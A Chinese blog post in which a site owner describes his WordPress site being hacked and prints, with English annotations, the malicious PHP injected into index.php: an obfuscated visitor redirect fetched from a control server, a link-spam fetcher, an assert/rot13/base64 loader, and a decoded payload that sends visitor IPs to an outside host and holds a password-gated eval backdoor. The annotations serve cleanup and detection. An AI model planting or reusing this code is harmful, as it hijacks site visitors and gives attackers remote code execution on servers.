网站两年没看,中途搬家了一次,6月份搬家了一次,今天偶然看一眼发现,我擦卡死,服务器配置低也不至于这样,查看代码一看被黑了。确实是两年来没更新我的疏忽,以后会断断续续慢慢更新。
网站做了如下调整:
- 修复漏洞,在 nginx 上开启了 WAF 防火墙,然后域名也做了防护。
- 升级了一下 WordPress 版本,然后全站 HTTPS 了。
- 然后修复各种漏洞和权限调整。
今天被黑的主代码如下:
// --- Injected segment 1 (prepended to index.php): redirect-domain cache. ---
// Variable names are random hex and every string literal is base64-encoded;
// that obfuscation style is itself a useful signature when triaging other
// files on the same host.
$id6fe1d0be634 = "/index/?2601510941471";   // path appended to whatever domain is fetched
$z8c7dd922ad47 = md5($id6fe1d0be634);      // cache file: the 32-hex md5 of that path, relative to the script's cwd
$u77e8e1445762 = time();
// filemtime() runs before the existence check: on a missing cache file it
// returns false, so the "age" below becomes time() - 0 and the refresh branch
// further down is taken.
$geaa082fa5781 = filemtime($z8c7dd922ad47);
// If the md5-named cache file exists, compute its age and read the cached data
// (stored as base64-encoded JSON).
$u07cc694b9b3f = $u77e8e1445762 - $geaa082fa5781;
if (file_exists($z8c7dd922ad47)) {
$fe1260894f59e = fopen($z8c7dd922ad47, base64_decode('cg=='));   // 'cg==' -> "r"
$xe4e46deb7f9c = json_decode(base64_decode(fread($fe1260894f59e, filesize($z8c7dd922ad47))) , 1);
fclose($fe1260894f59e);
}
// Cache missing or older than 60 s: refresh it via getDDroi() (defined
// below), which asks the operator's server for the current redirect domain.
// The redirect target is then "http://" . <domain> . <path>, which at the
// time of writing resolved to the URL on the next line.
// (The next line appears to be the post author's example that was rendered
// into the listing; it is not part of the original code.)
`http://taxitogo.tk/index/?2601510941471`
if ($u07cc694b9b3f >= 60 || !file_exists($z8c7dd922ad47)) {
$v9b207167e538 = getDDroi($z8c7dd922ad47);
if ($v9b207167e538[base64_decode('ZG9tYWlu') ]) {   // 'ZG9tYWlu' -> "domain"
$je617ef6974fa = base64_decode('aHR0cDovLw==') . $v9b207167e538[base64_decode('ZG9tYWlu') ] . $id6fe1d0be634;   // 'aHR0cDovLw==' -> "http://"
} else {
// Fallback when the primary server gave no domain: fetch one from the
// reserve URL stored under the cached JSON's "rsrv" key ('cnNydg==').
// If no cache existed, $xe4e46deb7f9c is unset here and the request URL is empty.
$wd88fc6edf21e = curl_init();
curl_setopt($wd88fc6edf21e, CURLOPT_RETURNTRANSFER, true);
curl_setopt($wd88fc6edf21e, CURLOPT_USERAGENT, base64_decode('QUkgcnNydg=='));   // "AI rsrv" - distinctive UA in egress logs
curl_setopt($wd88fc6edf21e, CURLOPT_URL, $xe4e46deb7f9c[base64_decode('cnNydg==') ]);
curl_setopt($wd88fc6edf21e, CURLOPT_TIMEOUT, 10);
$sad5f82e879a9 = curl_exec($wd88fc6edf21e);
curl_close($wd88fc6edf21e);
$je617ef6974fa = base64_decode('aHR0cDovLw==') . $sad5f82e879a9 . $id6fe1d0be634;   // raw response body used as the domain
}
} else {
// Fresh cache: use the cached domain directly.
$je617ef6974fa = base64_decode('aHR0cDovLw==') . $xe4e46deb7f9c[base64_decode('ZG9tYWlu') ] . $id6fe1d0be634;
}
/**
 * Fetches the current redirect domain from the operator's control server and
 * caches the answer on disk.
 *
 * GETs http://roi777.com/domain_temp.php?f=json (the base64 literal below)
 * with User-Agent "AI roi" and a 10 s timeout. If the JSON reply carries a
 * "domain" key, the raw reply is written base64-encoded to the cache file and
 * the decoded array is returned; otherwise false. All file errors are
 * suppressed with @, so a read-only web root silently disables caching only.
 *
 * Defender note: the host name and the "AI roi" User-Agent are the indicators
 * to block/alert on at the egress proxy.
 *
 * @param string $z8c7dd922ad47 cache file path (md5 of the redirect path, see the caller above)
 * @return array|false decoded JSON on success, false when no "domain" key was returned
 */
function getDDroi($z8c7dd922ad47) {
$wd88fc6edf21e = curl_init();
curl_setopt($wd88fc6edf21e, CURLOPT_RETURNTRANSFER, true);
curl_setopt($wd88fc6edf21e, CURLOPT_USERAGENT, base64_decode('QUkgcm9p'));   // "AI roi"
curl_setopt($wd88fc6edf21e, CURLOPT_URL, base64_decode('aHR0cDovL3JvaTc3Ny5jb20vZG9tYWluX3RlbXAucGhwP2Y9anNvbg=='));   // "http://roi777.com/domain_temp.php?f=json"
curl_setopt($wd88fc6edf21e, CURLOPT_TIMEOUT, 10);
$sb4a88417b3d0 = curl_exec($wd88fc6edf21e);
curl_close($wd88fc6edf21e);
$xe4e46deb7f9c = json_decode($sb4a88417b3d0, true);
if ($xe4e46deb7f9c[base64_decode('ZG9tYWlu') ]) {   // "domain"
$y0666f0acdeed = @fopen($z8c7dd922ad47, base64_decode('dys='));   // 'dys=' -> "w+"
// (The next line appears to be the post author's note on the fopen mode that
// was rendered into the listing; it is not part of the original code.)
fopen(a w+)
@fwrite($y0666f0acdeed, base64_encode($sb4a88417b3d0));   // cache holds base64(raw JSON reply)
@fclose($y0666f0acdeed);
return $xe4e46deb7f9c;
} else return false;
}
// Check whether the "a777d" cookie exists; if it does not, set it and emit the
// following redirect script:
// <script>window.location.replace("http://taxitogo.tk/index/?2601510941471");window.location.href = "http://taxitogo.tk/index/?2601510941471";</script>
// It redirects on the very first visit - what a miserable experience.
// Defender note: because the cookie lives 12 hours, a repeat visitor (for
// instance the site owner) is never redirected again, which is why this kind
// of hijack goes unnoticed; reproduce it with a fresh cookie-less session.
if (!$_COOKIE[base64_decode('YTc3N2Q=') ]) {   // 'YTc3N2Q=' -> "a777d"
setcookie(base64_decode('YTc3N2Q=') , 1, time() + 43200, base64_decode('Lw=='));   // 43200 s = 12 h, path "/"
echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi') . $je617ef6974fa . base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi') . $je617ef6974fa . base64_decode('Ijs8L3NjcmlwdD4=');   // the three literals decode to the <script> fragments shown above
}
//<script>window.location.replace("http://taxitogo.tk/index/?2601510941471");window.location.href = "http://taxitogo.tk/index/?2601510941471";</script>
// --- Original WordPress index.php content. ---
// The injected segments above were prepended to this file and the ones below
// appended to it. Replacing index.php with a clean copy from the matching
// WordPress release removes them; the rest of the install still needs checking.
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require (dirname(__FILE__) . '/wp-blog-header.php');
//##!#==##!#
// --- Injected segment 2 (appended after the WordPress loader): link spam. ---
// The "//##!#==##!#" marker brackets the injected code (it appears again at
// the end of the next segment) and is a convenient grep signature when
// cleaning other files.
// Every 24 hours, (re)create a file named "help" in the script's working
// directory from http://fped8.org/linkovka/get.php (the str_rot13 string
// below) and echo its content into the page - i.e. this plants whatever
// links the operator serves onto the site.
$time_sec = time();
$time_file = @filemtime("help");   // false when "help" does not exist yet
$time = $time_sec - $time_file;
if ($time > 86400 || !$time_file) {
$handle = @fopen("help", "w+");
if ($handle) {
$f = @file_get_contents(str_rot13("uggc://scrq8.bet/yvaxbixn/trg.cuc"));   // rot13 keeps the URL out of plain greps
@fwrite($handle, $f);
}
} else {
$handle = @fopen("help", "r");
$f = @fread($handle, filesize("help"));   // handle is never closed
}
echo $f;   // spam content is emitted on every request that goes through index.php
// This part is simply assert(str_rot13(<the big blob below>)); you can
// decode it yourself to check.
// --- Injected segment 3 loader. ---
// Silence every error channel, then build the names "assert" and "str_rot13"
// by concatenation so that a plain grep for eval/assert does not match.
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("display_errors", 0);
error_reporting(0);
$wa = ASSERT_WARNING;
@assert_options($wa, 0);                 // no warning if the asserted string fails
@assert_options(ASSERT_QUIET_EVAL, 1);
$strings = "as";
$strings.= "se";
$strings.= "rt";                         // $strings == "assert"
$strings2 = "st";
$strings2.= "r_r";
$strings2.= "ot13";                      // $strings2 == "str_rot13"
// (The next line appears to be the post author's annotation - "riny" is
// rot13 of "eval" - rendered into the listing; it is not part of the original
// code.)
str_rot13(riny())
// "riny(" . str_rot13("base64_decode"); after the rot13 below this reads
// eval(base64_decode
$gbz = "riny(" . $strings2("base64_decode");
// rot13 of the whole string yields an eval(base64_decode("...")); statement;
// the author's decoding of that payload follows in the next segment.
$light = $strings2($gbz . '("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8in29mqQugMJDho3WaY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwHkZTMzAmZ0Zmp3ZQN5ZzMvBGx2ZTVjBGuuL2H0ATSuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwx4MQH2L2DmMzZjAmNlMzV3LzMuBGMuBGIwLwx2ATD3VvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));');
// assert() with a string argument evaluates it as PHP code (PHP before 8.0),
// so this call is the actual execution step; the page's author-suppressed
// warnings above keep it quiet.
$strings($light);
//##!#==##!#
// The blob above decodes to the following code.
// --- Injected segment 3 payload: content-injection beacon plus a
// password-gated backdoor. ---
if (!isset($ibv)) {
@ini_set("display_errors", false);
@error_reporting(0);
// A visitor carrying the "client_check" cookie gets its value echoed straight
// into the page; nothing in this listing sets that cookie, so presumably the
// fetched content does - TODO confirm.
if (!empty($_COOKIE["client_check"]) && empty($ibv)) {
$ibv = $_COOKIE["client_check"];
echo $ibv;
} elseif (empty($ibv)) {
// Report the server address instead of the Host header for 127.0.* hosts.
if (strstr($_SERVER["HTTP_HOST"], "127.0")) {
$name = $_SERVER["SERVER_ADDR"];
} else {
$name = $_SERVER["HTTP_HOST"];
}
$usera = isset($_SERVER["HTTP_USER_AGENT"]) ? urlencode($_SERVER["HTTP_USER_AGENT"]) : "";
// Beacon: sends the visitor's IP, host + request URI and User-Agent to
// kost8med.org and receives the content to inject; "h" is the md5 of a
// hard-coded constant (a campaign/installation id, presumably).
// Defender note: this host name is the egress indicator for this segment.
$url = "http://kost8med.org/get.php?ip=" . urlencode($_SERVER["REMOTE_ADDR"]) . "&d=" . urlencode($name . $_SERVER["REQUEST_URI"]) . "&u=" . $usera . "&i=1&h=" . md5("510ff7343770092fb9960b098ace44aa11");
// Fetch with curl (5 s connect/total timeouts, body kept only on HTTP 200),
// falling back to file_get_contents() when allow_url_fopen is enabled.
if (function_exists("curl_init")) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
$ibv = curl_exec($ch);
$info = curl_getinfo($ch);
if ($info["http_code"] != 200) {
$ibv = "";
}
curl_close($ch);
} elseif (ini_get("allow_url_fopen") == 1) {
$ibv = file_get_contents($url);
}
// Backdoor: a POST whose "p" field double-md5s to the hard-coded hash gets its
// "c" field eval()'d as PHP - remote code execution gated by a password only
// the operator knows. The hash is the credential, so it is also the string
// to search for across the install; more generally, grep for
// eval(stripslashes($_POST to find variants.
if (!empty($_POST["p"]) && md5(md5($_POST["p"])) == "98d56cd3fc0702fb7bfa96a95cb964d7") {
@eval(stripslashes($_POST["c"]));
}
echo $ibv;   // remote content is emitted into the response
}
}
好了,就到这里感谢这位大哥不辞辛苦的渗透,其实我的网站没啥流量了现在,这里也说明下,以后会慢慢重新开始更新。